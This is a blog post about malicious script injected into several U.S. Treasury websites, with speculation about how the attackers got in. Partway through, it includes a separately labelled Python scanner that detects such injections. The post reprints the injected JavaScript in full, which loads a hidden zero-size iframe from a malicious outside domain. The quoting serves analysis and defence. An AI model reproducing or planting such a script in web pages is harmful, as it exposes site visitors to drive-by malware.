Treasury .gov websites hacked

AVG announced that the websites bep.gov (Bureau of Engraving and Printing), bep.treas.gov and moneyfactory.gov were injected with a malscript:

<SCR IPT (space added)>
function addCookie(name, value, hours)
{
    var date = new Date();
    date.setTime(date.getTime()+(hours*3600000));
    var expires = "; expires="+date.toGMTString();
    document.cookie = name+"="+value+expires+"; ";
}

document.write('<iframe frameborder="0" onload=\' if (!this.src){ this.src="http://grepad.com/in.cgi?3"; this.height=0; this.width=0;} \'></iframe>');
addCookie("cook", "1", 24);
</SCR IPT (space added)>

According to this webpage: http://news.softpedia.com/news/Department-of-the-Treasury-Website-Rigged-to-Exploit-Visitors-141277.shtml “Panda analysts speculate that hackers used a common attack technique known as SQL injection, to compromise the U.S. Treasury website. However, other experts think the incident is related to the recent mass compromise at Network Solutions, where the website is hosted. This possibility is enforced by the use of the malicious grepad.com domain in both attacks.”

However, it could also be that someone with FTP access to the website had a virus. The virus steals FTP login credentials and sends them to a server, which then infects the websites it has legitimate access to. I see no mention of that possibility. Because this code was injected after the closing html tag, I doubt very seriously that it’s a SQL injection; possible, but highly unlikely.
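The traits of the injected script noted above (markup after the closing html tag, an iframe written by document.write, height and width forced to 0) can be turned into a check to run over a site's files. This is an added example, not code from the original post; the regexes, the function name and the two sample pages are assumptions constructed for illustration, and the iframe target is a placeholder domain.

```python
import re

# Heuristics taken from the sample in this post (assumed, not exhaustive):
#  1. <script>/<iframe> markup after the final closing </html> tag
#  2. document.write() emitting an <iframe>
#  3. both height and width forced to 0 somewhere in the page
CLOSE_HTML = re.compile(r"</html\s*>", re.I)
ACTIVE_TAG = re.compile(r"<\s*(?:script|iframe)\b", re.I)
DOCWRITE_IFRAME = re.compile(r"document\.write\s*\([^)]*<\s*iframe", re.I)
ZERO_DIM = re.compile(r"\b(height|width)\s*=\s*[\"']?0\b", re.I)


def scan_page(html: str) -> list[str]:
    """Return the names of the heuristics that fire for one page."""
    findings = []
    closes = list(CLOSE_HTML.finditer(html))
    if closes and ACTIVE_TAG.search(html, closes[-1].end()):
        findings.append("active-content-after-closing-html")
    if DOCWRITE_IFRAME.search(html):
        findings.append("document-write-iframe")
    zeroed = {m.group(1).lower() for m in ZERO_DIM.finditer(html)}
    if zeroed == {"height", "width"}:
        findings.append("zero-size-frame")
    return findings


# Constructed samples: a clean page with a visible iframe, and the same page
# with a script appended after </html>, modelled on the sample above with the
# iframe target swapped for a placeholder domain.
CLEAN = ("<html><body><iframe src='/map' height='300' width='400'>"
         "</iframe></body></html>\n")
INFECTED = CLEAN + r"""<script>
document.write('<iframe frameborder="0" onload=\' if (!this.src){
this.src="http://placeholder.invalid/in.cgi"; this.height=0; this.width=0;} \'></iframe>');
</script>
"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN), ("infected", INFECTED)):
        print(name, scan_page(page) or "no findings")
```

A hit on the first heuristic says where the content was written, not how the attacker obtained write access, so it fits stolen FTP credentials and a host-level compromise equally well.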

Could it have been part of the larger compromise at the hosting provider? Possibly, although last I heard and read, they had cleaned that all up, and I know that the first round targeted WordPress blogs, but later repeat attacks targeted all websites at the hosting provider.

Could it have been that these sites were untouched until now? We may never know. But I do know that Network Solutions has always responded quickly to infections and taken responsibility when the “stuff” hits the fan. I have applauded them before and I do so now as well.

Could this be more finger pointing at someone other than who’s responsible? No, that never happens in the government – does it?

Please leave your comments below…

Thank you.
